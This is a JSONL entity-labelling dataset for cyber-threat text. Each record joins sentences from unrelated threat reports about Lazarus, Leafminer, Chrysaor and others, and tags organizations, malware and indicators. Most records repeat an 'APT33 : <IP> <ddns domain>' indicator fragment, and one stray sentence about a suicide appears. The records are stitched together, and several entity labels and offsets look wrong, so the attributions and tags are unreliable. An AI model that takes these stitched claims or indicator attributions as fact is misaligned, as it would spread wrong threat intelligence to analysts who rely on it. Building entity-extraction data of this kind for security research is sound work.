{"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group . APT33 : 91.230.121.143 remote-server.ddns.net . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": [{"start": 129, "end": 136, "label": "Organization"}, {"start": 176, "end": 185, "label": "Organization"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 237, "end": 255, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 393, "end": 397, "label": "Organization"}, {"start": 418, "end": 431, "label": "Organization"}, {"start": 434, "end": 439, "label": "Organization"}, {"start": 442, "end": 456, "label": "Indicator"}, {"start": 457, "end": 479, "label": "Indicator"}]}
{"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group . APT33 : 162.250.145.222 [REDACTED].ddns.net . loop all over the string to execute the decoding operation .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 89, "end": 100, "label": "System"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 257, "end": 270, "label": "Organization"}, {"start": 273, "end": 278, "label": "Organization"}, {"start": 281, "end": 296, "label": "Indicator"}, {"start": 297, "end": 316, "label": "Indicator"}]}
{"text": "Readers should carefully think through the risks before changing this default setting . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware . APT33 : 64.251.19.216 [REDACTED].redirectme.net . Cisco Secure Email ( formerly Cisco Email Security ) can block malicious emails sent by threat actors as part of their campaign .", "spans": [{"start": 106, "end": 119, "label": "Organization"}, {"start": 140, "end": 148, "label": "System"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 183, "end": 196, "label": "Indicator"}, {"start": 197, "end": 222, "label": "Indicator"}, {"start": 225, "end": 243, "label": "System"}, {"start": 255, "end": 275, "label": "System"}]}
{"text": "Top 20 countries targeted by Hummingbad/Shedun . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers . APT33 : 8.26.21.222 mynetwork.ddns.net . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": [{"start": 29, "end": 46, "label": "Malware"}, {"start": 67, "end": 80, "label": "Organization"}, {"start": 101, "end": 109, "label": "System"}, {"start": 154, "end": 173, "label": "Organization"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 184, "end": 195, "label": "Indicator"}, {"start": 196, "end": 214, "label": "Indicator"}, {"start": 244, "end": 250, "label": "System"}, {"start": 316, "end": 325, "label": "Malware"}]}
{"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus . APT33 : 8.26.21.223 [REDACTED].ddns.net . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": [{"start": 39, "end": 56, "label": "Malware"}, {"start": 71, "end": 82, "label": "Organization"}, {"start": 257, "end": 269, "label": "Organization"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 280, "end": 291, "label": "Indicator"}, {"start": 292, "end": 311, "label": "Indicator"}, {"start": 337, "end": 345, "label": "Organization"}]}
{"text": "Check Point Software Hummingbad/Shedun infections by Android version . In November 2017 , Secureworks Counter Threat Unit\u2122 ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company . APT33 : 217.147.168.44 remserver.ddns.net . Establish robust network segmentation between MicroSCADA hosts and IT networks .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 21, "end": 38, "label": "Malware"}, {"start": 53, "end": 60, "label": "System"}, {"start": 90, "end": 122, "label": "Organization"}, {"start": 125, "end": 128, "label": "Organization"}, {"start": 171, "end": 189, "label": "Organization"}, {"start": 201, "end": 214, "label": "Organization"}, {"start": 241, "end": 255, "label": "Organization"}, {"start": 259, "end": 270, "label": "Organization"}, {"start": 390, "end": 412, "label": "Organization"}, {"start": 415, "end": 420, "label": "Organization"}, {"start": 423, "end": 437, "label": "Indicator"}, {"start": 438, "end": 456, "label": "Indicator"}]}
{"text": "Enlarge / Hummingbad/Shedun infections by Android version . In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company . APT33 : 195.20.52.172 mynetwork.cf . In other instances , such as the Babuk source code , the leaks were seemingly an operational error .", "spans": [{"start": 10, "end": 27, "label": "Malware"}, {"start": 42, "end": 49, "label": "System"}, {"start": 79, "end": 82, "label": "Organization"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 286, "end": 308, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 319, "end": 332, "label": "Indicator"}, {"start": 333, "end": 345, "label": "Indicator"}, {"start": 381, "end": 398, "label": "Malware"}]}
{"text": "Check Point Software So far , HummingBad has been observed using its highly privileged status only to engage in click fraud , display pop-up ads , tamper with Google Play , and install additional apps that do more of the same . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . APT33 : 8.26.21.221 mynetwork.ddns.net . Further fields of interest in the XPdb had the prefix \u201c responsible _ \u201d and contained information about the parent of the process which violated the behavioral rules .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 30, "end": 40, "label": "Malware"}, {"start": 159, "end": 170, "label": "System"}, {"start": 228, "end": 236, "label": "System"}, {"start": 319, "end": 343, "label": "Organization"}, {"start": 412, "end": 435, "label": "Organization"}, {"start": 438, "end": 443, "label": "Organization"}, {"start": 446, "end": 457, "label": "Indicator"}, {"start": 458, "end": 476, "label": "Indicator"}, {"start": 513, "end": 517, "label": "System"}]}
{"text": "But there 's little stopping it from doing much worse . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing . APT33 : 8.26.21.220 [REDACTED].ddns.net . One possibility is that such claims were made disingenuously as an attempt to establish KillNet 's credibility and/or as a means to distance the group from the Russian government .", "spans": [{"start": 56, "end": 59, "label": "Organization"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 197, "end": 208, "label": "Indicator"}, {"start": 209, "end": 228, "label": "Indicator"}, {"start": 387, "end": 411, "label": "Organization"}]}
{"text": "That 's because the malware roots most of the phones it infects , a process that subverts key security mechanisms built into Android . CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns . APT33 : 8.26.21.221 [REDACTED].ddns.net . While we were unable to identify the SCIL commands executed , we believe they were probably commands to open circuit breakers in the victim \u2019s substation environments .", "spans": [{"start": 125, "end": 132, "label": "System"}, {"start": 135, "end": 138, "label": "Organization"}, {"start": 165, "end": 179, "label": "Organization"}, {"start": 182, "end": 189, "label": "Organization"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 291, "end": 302, "label": "Indicator"}, {"start": 303, "end": 322, "label": "Indicator"}]}
{"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign . APT33 : 91.230.121.144 remserver.ddns.net . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 183, "end": 186, "label": "Organization"}, {"start": 236, "end": 250, "label": "Organization"}, {"start": 298, "end": 303, "label": "Organization"}, {"start": 306, "end": 320, "label": "Indicator"}, {"start": 321, "end": 339, "label": "Indicator"}, {"start": 394, "end": 401, "label": "Organization"}]}
{"text": "System applications with root , by contrast , have super-user permissions that allow them to break out of such sandboxes . CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 89.34.237.118 mywinnetwork.ddns.net . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the \u201c PIG RANGE \u201d .", "spans": [{"start": 123, "end": 126, "label": "Organization"}, {"start": 173, "end": 191, "label": "System"}, {"start": 236, "end": 250, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 284, "end": 297, "label": "Indicator"}, {"start": 298, "end": 319, "label": "Indicator"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 367, "end": 419, "label": "Indicator"}]}
{"text": "From there , root-level apps can read or modify data and resources that would be off-limits to normal apps . CTU researchers also identified components in the custom C2 protocol being used ( the way in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 192.119.15.35 mynetwork.ddns.net . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": [{"start": 109, "end": 112, "label": "Organization"}, {"start": 159, "end": 177, "label": "System"}, {"start": 296, "end": 310, "label": "Organization"}, {"start": 313, "end": 320, "label": "Organization"}, {"start": 336, "end": 341, "label": "Organization"}, {"start": 344, "end": 357, "label": "Indicator"}, {"start": 358, "end": 376, "label": "Indicator"}, {"start": 405, "end": 447, "label": "Organization"}]}
{"text": "As Lookout first reported more than eight months ago , the problem with Shedun/HummingBad and similar malicious app families that silently exploit Android rooting vulnerabilities is that the infections can survive normal factory resets . Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts . APT33 : 5.79.127.177 mypsh.ddns.net . \" Learn about indicators of compromise and their role in detection and response in Data Protection 101 , our series on the fundamentals of information security .", "spans": [{"start": 3, "end": 10, "label": "Organization"}, {"start": 72, "end": 89, "label": "Malware"}, {"start": 147, "end": 178, "label": "Vulnerability"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}, {"start": 448, "end": 460, "label": "Indicator"}, {"start": 461, "end": 475, "label": "Indicator"}, {"start": 561, "end": 580, "label": "Organization"}]}
{"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group . APT33 : 192.119.15.35 [REDACTED].ddns.net . The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 121, "end": 127, "label": "Malware"}, {"start": 288, "end": 291, "label": "System"}, {"start": 345, "end": 359, "label": "Organization"}, {"start": 362, "end": 369, "label": "Organization"}, {"start": 372, "end": 384, "label": "Organization"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 395, "end": 408, "label": "Indicator"}, {"start": 409, "end": 428, "label": "Indicator"}, {"start": 435, "end": 447, "label": "Organization"}, {"start": 604, "end": 617, "label": "Organization"}]}
{"text": "An investigation of Chrysaor Malware on Android 03 April 2017 Google is constantly working to improve our systems that protect users from Potentially Harmful Applications ( PHAs ) . During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and exfiltration . APT33 : 192.119.15.35 [REDACTED].ddns.net . As such , we \u2019ve seen a growing number of reports of victims who are targeted with commercial spyware .", "spans": [{"start": 20, "end": 28, "label": "Malware"}, {"start": 40, "end": 47, "label": "System"}, {"start": 62, "end": 68, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 373, "end": 378, "label": "Organization"}, {"start": 443, "end": 448, "label": "Organization"}, {"start": 451, "end": 464, "label": "Indicator"}, {"start": 465, "end": 484, "label": "Indicator"}, {"start": 511, "end": 588, "label": "Indicator"}]}
{"text": "Usually , PHA authors attempt to install their harmful apps on as many devices as possible . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer . APT33 : 192.119.15.35 [REDACTED].ddns.net . The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": [{"start": 196, "end": 212, "label": "System"}, {"start": 228, "end": 237, "label": "Organization"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 248, "end": 261, "label": "Indicator"}, {"start": 262, "end": 281, "label": "Indicator"}, {"start": 320, "end": 336, "label": "Organization"}, {"start": 341, "end": 352, "label": "Organization"}, {"start": 355, "end": 380, "label": "Organization"}, {"start": 383, "end": 404, "label": "Organization"}, {"start": 409, "end": 423, "label": "Organization"}]}
{"text": "However , a few PHA authors spend substantial effort , time , and money to create and install their harmful app on one or a very small number of devices . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers . APT33 : 192.119.15.36 [REDACTED].ddns.net . While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month \u2019s review we speculated that Royal might be going through a rebrand .", "spans": [{"start": 258, "end": 274, "label": "System"}, {"start": 290, "end": 299, "label": "Organization"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 310, "end": 323, "label": "Indicator"}, {"start": 324, "end": 343, "label": "Indicator"}, {"start": 493, "end": 498, "label": "Organization"}]}
{"text": "This is known as a targeted attack . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . APT33 : 192.119.15.37 mynetwork.ddns.net . What \u2019s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": [{"start": 41, "end": 50, "label": "Organization"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 199, "end": 212, "label": "Indicator"}, {"start": 213, "end": 231, "label": "Indicator"}, {"start": 278, "end": 284, "label": "System"}]}
{"text": "In this blog post , we describe Chrysaor , a newly discovered family of spyware that was used in a targeted attack on a small number of Android devices , and how investigations like this help Google protect Android users from a variety of threats . Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army . APT33 : 192.119.15.38 [REDACTED].ddns.net . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": [{"start": 32, "end": 40, "label": "Malware"}, {"start": 136, "end": 143, "label": "System"}, {"start": 192, "end": 198, "label": "Organization"}, {"start": 207, "end": 214, "label": "System"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 341, "end": 349, "label": "Organization"}, {"start": 388, "end": 400, "label": "Organization"}, {"start": 401, "end": 409, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 420, "end": 433, "label": "Indicator"}, {"start": 434, "end": 453, "label": "Indicator"}]}
{"text": "What is Chrysaor ? Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan . APT33 : 192.119.15.39 remote-server.ddns.net . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 8, "end": 16, "label": "Malware"}, {"start": 60, "end": 69, "label": "Organization"}, {"start": 174, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Indicator"}, {"start": 196, "end": 218, "label": "Indicator"}, {"start": 302, "end": 342, "label": "System"}, {"start": 400, "end": 408, "label": "System"}]}
{"text": "Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East . APT33 : 192.119.15.40 [REDACTED].ddns.net . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 46, "end": 68, "label": "Organization"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 224, "end": 239, "label": "System"}, {"start": 251, "end": 271, "label": "System"}, {"start": 293, "end": 298, "label": "Organization"}, {"start": 301, "end": 314, "label": "Indicator"}, {"start": 315, "end": 334, "label": "Indicator"}]}
{"text": "Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 . APT33 : 192.119.15.41 mynetwork.cf . Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.[7 ] Magic Hound malware has used IRC for C2.[8][9 ] Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 87, "end": 90, "label": "System"}, {"start": 107, "end": 118, "label": "Organization"}, {"start": 123, "end": 130, "label": "Organization"}, {"start": 151, "end": 160, "label": "System"}, {"start": 234, "end": 248, "label": "Organization"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 273, "end": 286, "label": "Indicator"}, {"start": 287, "end": 299, "label": "Indicator"}, {"start": 322, "end": 338, "label": "System"}, {"start": 342, "end": 352, "label": "Indicator"}, {"start": 383, "end": 400, "label": "System"}, {"start": 409, "end": 425, "label": "System"}, {"start": 428, "end": 447, "label": "Malware"}, {"start": 457, "end": 460, "label": "System"}, {"start": 465, "end": 473, "label": "System"}, {"start": 476, "end": 487, "label": "Organization"}, {"start": 501, "end": 509, "label": "System"}]}
{"text": "Late last year , after receiving a list of suspicious package names from Lookout , we discovered that a few dozen Android devices may have installed an application related to Pegasus , which we named Chrysaor . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . APT33 : 192.119.15.42 [REDACTED].ddns.net . With an understanding of the basic motivations that drive cyberattacks organizations can better identify where their own assets may be at risk and thereby more efficiently and effectively address identified risks .", "spans": [{"start": 73, "end": 80, "label": "Organization"}, {"start": 114, "end": 121, "label": "System"}, {"start": 175, "end": 182, "label": "Malware"}, {"start": 200, "end": 208, "label": "Malware"}, {"start": 211, "end": 220, "label": "Organization"}, {"start": 335, "end": 354, "label": "Vulnerability"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 388, "end": 401, "label": "Indicator"}, {"start": 402, "end": 421, "label": "Indicator"}, {"start": 482, "end": 508, "label": "Organization"}]}
{"text": "Although the applications were never available in Google Play , we immediately identified the scope of the problem by using Verify Apps . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . gaming industry scope attackers asia . Significantly , Anonymous Sudan has caused significant disruptions at a level not observed by KillNet affiliates previously .", "spans": [{"start": 50, "end": 61, "label": "System"}, {"start": 124, "end": 135, "label": "System"}, {"start": 142, "end": 161, "label": "Vulnerability"}, {"start": 275, "end": 280, "label": "System"}, {"start": 283, "end": 291, "label": "System"}, {"start": 362, "end": 377, "label": "Organization"}]}
{"text": "We gathered information from affected devices , and concurrently , attempted to acquire Chrysaor apps to better understand its impact on users . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . This is not the first time the gaming industry has been targeted by attackers who compromise game developers , insert backdoors into a game\u2019s build environment , and then have their malware distributed as legitimate software . securityd-555549440fca1d2f1e613094b0c768d393f83d7f", "spans": [{"start": 88, "end": 96, "label": "Malware"}, {"start": 149, "end": 158, "label": "Organization"}, {"start": 159, "end": 168, "label": "Organization"}, {"start": 173, "end": 184, "label": "Vulnerability"}, {"start": 498, "end": 548, "label": "Malware"}]}
{"text": "We 've contacted the potentially affected users , disabled the applications on affected devices , and implemented changes in Verify Apps to protect all users . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . This is possibly an indication of compromised login credentials , and it can be verified by further investigating the login attempts and recent activities by the same user .", "spans": [{"start": 125, "end": 136, "label": "System"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 221, "end": 245, "label": "Vulnerability"}, {"start": 248, "end": 261, "label": "Vulnerability"}, {"start": 321, "end": 334, "label": "Organization"}]}
{"text": "What is the scope of Chrysaor ? Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability . That attack was attributed to perpetrators Kaspersky called the Winnti Group . In reality he stated he simply loved to rob banks .", "spans": [{"start": 21, "end": 29, "label": "Malware"}, {"start": 50, "end": 59, "label": "Organization"}, {"start": 84, "end": 97, "label": "System"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 195, "end": 201, "label": "Organization"}]}
{"text": "Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . The attackers also leveraged DLL sideloading in that campaign to load their HyperBro malware .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 32, "end": 43, "label": "System"}, {"start": 93, "end": 104, "label": "System"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 267, "end": 276, "label": "System"}, {"start": 420, "end": 424, "label": "Organization"}, {"start": 443, "end": 452, "label": "Organization"}, {"start": 492, "end": 500, "label": "Organization"}, {"start": 515, "end": 531, "label": "Malware"}]}
{"text": "Among the over 1.4 billion devices protected by Verify Apps , we observed fewer than 3 dozen installs of Chrysaor on victim devices . Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia . This time , two games and one gaming platform application were compromised to include a backdoor . When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": [{"start": 48, "end": 59, "label": "System"}, {"start": 105, "end": 113, "label": "Malware"}, {"start": 226, "end": 235, "label": "System"}, {"start": 239, "end": 248, "label": "Organization"}]}
{"text": "These devices were located in the following countries : How we protect you To protect Android devices and users , Google Play provides a complete set of security services that update outside of platform releases . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn\u2019t be surprising they are the work of the group described in Kaspersky \u2019s \u201c Winnti \u2013 More than just a game \u201d . Geographically , most victims are located in Europe , specifically Italy .", "spans": [{"start": 86, "end": 93, "label": "System"}, {"start": 114, "end": 125, "label": "System"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 276, "end": 291, "label": "Organization"}, {"start": 294, "end": 307, "label": "System"}, {"start": 312, "end": 326, "label": "System"}, {"start": 485, "end": 494, "label": "Organization"}, {"start": 500, "end": 506, "label": "Organization"}]}
{"text": "Users do n't have to install any additional security services to keep their devices safe . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East . Although the malware uses different configurations in each case , the three affected software products included the same backdoor code and were launched using the same mechanism . The malware will then create the file RECOVERFILES.txt in each scanned folder .", "spans": [{"start": 91, "end": 100, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 388, "end": 395, "label": "Malware"}, {"start": 422, "end": 461, "label": "Indicator"}]}
{"text": "In 2016 , these services protected over 1.4 billion devices , making Google one of the largest providers of on-device security services in the world : Identify PHAs using people , systems in the cloud , and data sent to us from devices Warn users about or blocking users from installing PHAs Continually scan devices for PHAs and other harmful threats Additionally , we are providing detailed technical information to help the security industry in our collective work against PHAs . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors . While two of the compromised products no longer include the backdoor , one of the affected developers is still distributing the trojanized version : ironically , the game is named Infestation , and is produced by Thai developer Electronics Extreme . One of the most common ways that cybercriminals earn money is by selling data on the black market .", "spans": [{"start": 69, "end": 75, "label": "Organization"}, {"start": 483, "end": 492, "label": "Organization"}, {"start": 618, "end": 631, "label": "Organization"}, {"start": 862, "end": 881, "label": "Organization"}, {"start": 917, "end": 931, "label": "Organization"}]}
{"text": "What do I need to do ? Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . We have tried informing them several times , through various channels , since early February , but without apparent success . If network logs were analyzed individually across that journey , it is likely that all requests were either in compliance with the policies embedded into the firewalls at every node , or some unpatched vulnerability prevented a control action against unauthorized data transfers .", "spans": [{"start": 23, "end": 32, "label": "Organization"}, {"start": 289, "end": 301, "label": "Indicator"}, {"start": 369, "end": 467, "label": "Indicator"}, {"start": 473, "end": 564, "label": "Vulnerability"}]}
{"text": "It is extremely unlikely you or someone you know was affected by Chrysaor malware . Dragos has identified Leafminer group targeting access operations in the electric utility sector . Let\u2019s look at how the malicious payload is embedded and then look into the details of the backdoor itself . On June 25 , 2022 , KillNet messaging suggested that Conti was ready to fight , that Lithuania was its new testing ground for DDoS attacks , and that its \" Zarya \" hackers were preparing for cyber operations .", "spans": [{"start": 65, "end": 73, "label": "Malware"}, {"start": 84, "end": 90, "label": "Organization"}, {"start": 106, "end": 121, "label": "Organization"}, {"start": 157, "end": 180, "label": "Organization"}, {"start": 417, "end": 429, "label": "Organization"}, {"start": 447, "end": 452, "label": "Organization"}]}
{"text": "Through our investigation , we identified less than 3 dozen devices affected by Chrysaor , we have disabled Chrysaor on those devices , and we have notified users of all known affected devices . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 . The payload code is started very early during the execution of the backdoored executable file . The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 108, "end": 116, "label": "Malware"}, {"start": 207, "end": 214, "label": "Organization"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 512, "end": 569, "label": "Organization"}]}
{"text": "Additionally , the improvements we made to our protections have been enabled for all users of our security services . RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia . Right after the PE entry point , the standard call to the C Runtime initialization ( __scrt_common_main_seh ) is hooked to launch the malicious payload before everything else . More information Over the course of three and a half years , OilRig has used various backdoors , starting with DanBot , as well as using the Shark backdoor in April 2021 before transitioning to the Milan backdoor and the new backdoor Marlin in August 2021 .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 290, "end": 312, "label": "System"}, {"start": 443, "end": 449, "label": "Organization"}, {"start": 493, "end": 499, "label": "Malware"}, {"start": 523, "end": 537, "label": "Malware"}, {"start": 580, "end": 594, "label": "Malware"}, {"start": 616, "end": 622, "label": "Malware"}]}
{"text": "To ensure you are fully protected against PHAs and other threats , we recommend these 5 basic steps : Install apps only from reputable sources : Install apps from a reputable source , such as Google Play . RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East . This may suggest that the malefactor changed a build configuration rather than the source code itself . Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": [{"start": 192, "end": 203, "label": "System"}, {"start": 206, "end": 213, "label": "Organization"}, {"start": 242, "end": 250, "label": "Organization"}, {"start": 254, "end": 263, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 449, "end": 475, "label": "System"}, {"start": 487, "end": 509, "label": "System"}]}
{"text": "No Chrysaor apps were on Google Play . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector . The code added to the executable decrypts and launches the backdoor in-memory before resuming normal execution of the C Runtime initialization code and all the subsequent code of the host application . The eventual execution of the attack coincided with the start of a multi - day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities , including the city in which the victim was located .", "spans": [{"start": 3, "end": 11, "label": "Malware"}, {"start": 25, "end": 36, "label": "System"}, {"start": 39, "end": 46, "label": "Organization"}, {"start": 125, "end": 148, "label": "Organization"}]}
{"text": "Enable a secure lock screen : Pick a PIN , pattern , or password that is easy for you to remember and hard for others to guess . This means that the Leafminer group is targeting electric utilities . The embedded payload data has a specific structure , that is parsed by the added unpacking code . Rhysida \u2019s encryption algorithm is relatively straightforward and uses the ChaCha20 encryption algorithm .", "spans": [{"start": 149, "end": 164, "label": "Organization"}, {"start": 178, "end": 196, "label": "Organization"}, {"start": 297, "end": 328, "label": "Malware"}, {"start": 363, "end": 401, "label": "Malware"}]}
{"text": "Update your device : Keep your device up-to-date with the latest security patches . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events . It includes an RC4 key ( which is XORed with 0x37 ) that is used to decrypt a filename and the embedded DLL file . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 128, "end": 131, "label": "System"}, {"start": 145, "end": 152, "label": "Organization"}, {"start": 279, "end": 281, "label": "Organization"}, {"start": 329, "end": 332, "label": "System"}, {"start": 357, "end": 364, "label": "System"}, {"start": 376, "end": 391, "label": "System"}, {"start": 446, "end": 449, "label": "System"}, {"start": 580, "end": 585, "label": "Organization"}, {"start": 651, "end": 661, "label": "System"}]}
